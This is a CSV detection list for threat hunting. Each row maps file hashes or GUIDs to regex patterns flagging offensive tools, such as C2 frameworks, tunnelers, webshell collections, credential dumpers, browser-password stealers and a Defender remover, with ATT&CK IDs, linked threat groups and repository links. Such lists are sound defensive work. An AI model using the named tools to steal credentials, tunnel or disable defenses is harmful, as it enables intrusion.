"*06c177a58759cb2d8947e425086a1d945d252c411c649121c5ec1bb795452b34*",".{0,1000}06c177a58759cb2d8947e425086a1d945d252c411c649121c5ec1bb795452b34.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21134"
"*06c66818ff2074772a93f1f6f40047ddfcb60928b03b89cc6d132db0450c9f62*",".{0,1000}06c66818ff2074772a93f1f6f40047ddfcb60928b03b89cc6d132db0450c9f62.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21135"
"*06c71bc30e557ceab6964543bd0d68e1b9dfefa272b51a46f60171af621b5f42*",".{0,1000}06c71bc30e557ceab6964543bd0d68e1b9dfefa272b51a46f60171af621b5f42.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21137"
"*06c7708610ab5a1cfda659fd349fd92315a4a58ed851466ce565e7866d77f375*",".{0,1000}06c7708610ab5a1cfda659fd349fd92315a4a58ed851466ce565e7866d77f375.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21138"
"*06c92c9a18667e8d0d624f3de3dac6d3db96f3ce5f3e738a0c49ffa92d32c068*",".{0,1000}06c92c9a18667e8d0d624f3de3dac6d3db96f3ce5f3e738a0c49ffa92d32c068.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","21139"
"*06e22309431bcbf87df30bb1b6e971b0edfe05f7f466f87e9c9982c3e4715bc5*",".{0,1000}06e22309431bcbf87df30bb1b6e971b0edfe05f7f466f87e9c9982c3e4715bc5.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","21145"
"*06e7d0050e4aac352307c5b20372badd841e275bafc1dfe2ecbd0f2ad6366f81*",".{0,1000}06e7d0050e4aac352307c5b20372badd841e275bafc1dfe2ecbd0f2ad6366f81.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","21146"
"*06e8a15602cc6001db8ac6d14c4cf938a92aab83a446bcd5c2c4334ad4b44e6e*",".{0,1000}06e8a15602cc6001db8ac6d14c4cf938a92aab83a446bcd5c2c4334ad4b44e6e.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","21147"
"*06e8f3cc9768b22015a52d96357a11185c43c239e887a1346e58eb8ab08c4471*",".{0,1000}06e8f3cc9768b22015a52d96357a11185c43c239e887a1346e58eb8ab08c4471.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21148"
"*06f02a7b690087feea7f4e48b71e219c98de681cf3b1fdc3097f6264775dab62*",".{0,1000}06f02a7b690087feea7f4e48b71e219c98de681cf3b1fdc3097f6264775dab62.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","21149"
"*06f14218e0f7b881a61c998824e6709b313b5c8baaa87a8d15986b0c5cf2b7cb*",".{0,1000}06f14218e0f7b881a61c998824e6709b313b5c8baaa87a8d15986b0c5cf2b7cb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21150"
"*06f43329147155af22520cda36202f9af0bd46b5e30b3d3f202d2a463aa2729d*",".{0,1000}06f43329147155af22520cda36202f9af0bd46b5e30b3d3f202d2a463aa2729d.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#filehash","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","21152"
"*07019d2f4f6839056c0faf4f98e284f05c3f899f511d9766490c93d6a961fb71*",".{0,1000}07019d2f4f6839056c0faf4f98e284f05c3f899f511d9766490c93d6a961fb71.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","21153"
"*0704e26e14a875b68311801b1009c8e9291df4709ff24e1f1aa877ac57b035e7*",".{0,1000}0704e26e14a875b68311801b1009c8e9291df4709ff24e1f1aa877ac57b035e7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21155"
"*0705092d4c2a8e0475d1f686166b9b1ecb999c0133a0eaf8a7b8fd902dc64930*",".{0,1000}0705092d4c2a8e0475d1f686166b9b1ecb999c0133a0eaf8a7b8fd902dc64930.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21156"
"*070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924*",".{0,1000}070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","21157"
"*070f9bbe7bf3f68bca8bcc2b0baa1a6eadc0105e2e1766b06a0f5a912d12fcab*",".{0,1000}070f9bbe7bf3f68bca8bcc2b0baa1a6eadc0105e2e1766b06a0f5a912d12fcab.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","21158"
"*071665786d0527bd94736db21ce49db2a113e1429d0413dbbdde0975506394e8*",".{0,1000}071665786d0527bd94736db21ce49db2a113e1429d0413dbbdde0975506394e8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21159"
"*07249ebf1045b25fce113f88373e816cd382d2147540ec274a1b1a0356004c7b*",".{0,1000}07249ebf1045b25fce113f88373e816cd382d2147540ec274a1b1a0356004c7b.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","21163"
"*072b5eabc55e8df614786b965d9055fb1414059d28649da7258495f1f5b994d5*",".{0,1000}072b5eabc55e8df614786b965d9055fb1414059d28649da7258495f1f5b994d5.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21165"
"*07368a750023441d5e62634ca40ba8840a389a29ce56f0911a60271fcc55f521*",".{0,1000}07368a750023441d5e62634ca40ba8840a389a29ce56f0911a60271fcc55f521.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21168"
"*07381878641e99bfa6ff286ba7010c04e9055e1dd7c27c079063617a18e1da03*",".{0,1000}07381878641e99bfa6ff286ba7010c04e9055e1dd7c27c079063617a18e1da03.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21169"
"*073a84685fb4031ef1d19df47b3e89714ab24bfed80ee48012ba300e4218ffc2*",".{0,1000}073a84685fb4031ef1d19df47b3e89714ab24bfed80ee48012ba300e4218ffc2.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","21170"
"*073f74ea0d5d2805e2255bdfc5cb697f5292c5b96ca55791187eaaa7ca6d3ca9*",".{0,1000}073f74ea0d5d2805e2255bdfc5cb697f5292c5b96ca55791187eaaa7ca6d3ca9.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21171"
"*07400fb1198a8326fead8180f927e62e218885a4940b9879082d2adf49064ea5*",".{0,1000}07400fb1198a8326fead8180f927e62e218885a4940b9879082d2adf49064ea5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21173"
"*074776f0f7421779a3b8c58553a25ccde6f81184b79feb913b679e3ac9e7ee06*",".{0,1000}074776f0f7421779a3b8c58553a25ccde6f81184b79feb913b679e3ac9e7ee06.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21174"
"*0748293c2020daf803a3a57f1939a98fd25b074eff46b73028550f431f91ed32*",".{0,1000}0748293c2020daf803a3a57f1939a98fd25b074eff46b73028550f431f91ed32.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21176"
"*074d726bf6cee59fe07d6f479b5f703fe423c17aca1bb047ce76459a24cf9916*",".{0,1000}074d726bf6cee59fe07d6f479b5f703fe423c17aca1bb047ce76459a24cf9916.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21178"
"*0750514b25767d24d1a2923f95d3b88b5018b7b44476828f7c36a1d4003bddf0*",".{0,1000}0750514b25767d24d1a2923f95d3b88b5018b7b44476828f7c36a1d4003bddf0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21179"
"*0756dc393b6d41fd03e69063d91342c43e60e4ce5fc63706bda46da0f8913657*",".{0,1000}0756dc393b6d41fd03e69063d91342c43e60e4ce5fc63706bda46da0f8913657.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21180"
"*07628592-5A22-4C0A-9330-6C90BD7A94B6*",".{0,1000}07628592\-5A22\-4C0A\-9330\-6C90BD7A94B6.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","#GUIDproject","N/A","10","2","157","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z","21183"
"*076578d158003656371b54b02b8082e30afb48176e536517339b5034f46bd016*",".{0,1000}076578d158003656371b54b02b8082e30afb48176e536517339b5034f46bd016.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21184"
"*076e2595f86d9c29af1d990f5a2447025fc836a26c0f5663e53b0d1399950644*",".{0,1000}076e2595f86d9c29af1d990f5a2447025fc836a26c0f5663e53b0d1399950644.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#filehash","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","21187"
"*076ecfd382b059466f47da6ec57866373451cb46b5fa1921874c23f094aa8912*",".{0,1000}076ecfd382b059466f47da6ec57866373451cb46b5fa1921874c23f094aa8912.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21188"
"*0771a4c0fcbe55ce0e36aa1af50febcf4c2e96643a281a8de703a28f88536434*",".{0,1000}0771a4c0fcbe55ce0e36aa1af50febcf4c2e96643a281a8de703a28f88536434.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","21189"
"*07767d1f2d939b8c1fcd6c4d2052069d711719f4e238c800fd500fac405df316*",".{0,1000}07767d1f2d939b8c1fcd6c4d2052069d711719f4e238c800fd500fac405df316.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21190"
"*078682e4de2e678702911508629fc3e0f293628720e67506340155091ce06ac5*",".{0,1000}078682e4de2e678702911508629fc3e0f293628720e67506340155091ce06ac5.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","21191"
"*07878d4fc3ba5f9be83d693dceb90a590099ff908221e2935488d50aa70cffb4*",".{0,1000}07878d4fc3ba5f9be83d693dceb90a590099ff908221e2935488d50aa70cffb4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21192"
"*0790530e1e0f1ed73b2b6fd701d75a2409c785af5367304d5fdd5bdfdf7eae46*",".{0,1000}0790530e1e0f1ed73b2b6fd701d75a2409c785af5367304d5fdd5bdfdf7eae46.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","21194"
"*0796f9b079afb6b3a36ab11ae96bcad44364429fd9bceee074225736507bb14e*",".{0,1000}0796f9b079afb6b3a36ab11ae96bcad44364429fd9bceee074225736507bb14e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","21195"
"*079bb8c94b5877751bc6015b2d82a8721d150a9849482eaa3b6332d252371f72*",".{0,1000}079bb8c94b5877751bc6015b2d82a8721d150a9849482eaa3b6332d252371f72.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21197"
"*07a00b5f4f4d8fd3328b5454dc101d4e76126d9e2600ca2d6fd677452bf624d7*",".{0,1000}07a00b5f4f4d8fd3328b5454dc101d4e76126d9e2600ca2d6fd677452bf624d7.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","21198"
"*07a00b5f4f4d8fd3328b5454dc101d4e76126d9e2600ca2d6fd677452bf624d7*",".{0,1000}07a00b5f4f4d8fd3328b5454dc101d4e76126d9e2600ca2d6fd677452bf624d7.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#filehash","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","21199"
"*07a474dfcef198d7d5bf8261de06eed7c9528802e9065faf2a63c7ef6b992986*",".{0,1000}07a474dfcef198d7d5bf8261de06eed7c9528802e9065faf2a63c7ef6b992986.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21201"
"*07aa565057af859bc4956df913246b3b5fe39e86823666d6ba77aa98a697b02a*",".{0,1000}07aa565057af859bc4956df913246b3b5fe39e86823666d6ba77aa98a697b02a.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","21202"
"*07bbfa80e6278158beec9685f17d0e305a03449433bd0485bcf492a57c480f80*",".{0,1000}07bbfa80e6278158beec9685f17d0e305a03449433bd0485bcf492a57c480f80.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","21205"
"*07c90800861a9cb41dd71f0af41af0ce1b174fccf71bf88abc6d82f0208b2d78*",".{0,1000}07c90800861a9cb41dd71f0af41af0ce1b174fccf71bf88abc6d82f0208b2d78.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21210"
"*07d01f86a1a030d45d8fb8b372cfd986b8f3a7d530046f16acc5e82082e53ec6*",".{0,1000}07d01f86a1a030d45d8fb8b372cfd986b8f3a7d530046f16acc5e82082e53ec6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21213"
"*07d53bb25aaa1b6ed1de40f0b8999be20a399172e49876cac3600503793df581*",".{0,1000}07d53bb25aaa1b6ed1de40f0b8999be20a399172e49876cac3600503793df581.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21214"
"*07d8d02d79b1653fdb0f1c91a56d62f7f1a418564874605e07755a1f9f010b61*",".{0,1000}07d8d02d79b1653fdb0f1c91a56d62f7f1a418564874605e07755a1f9f010b61.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21215"
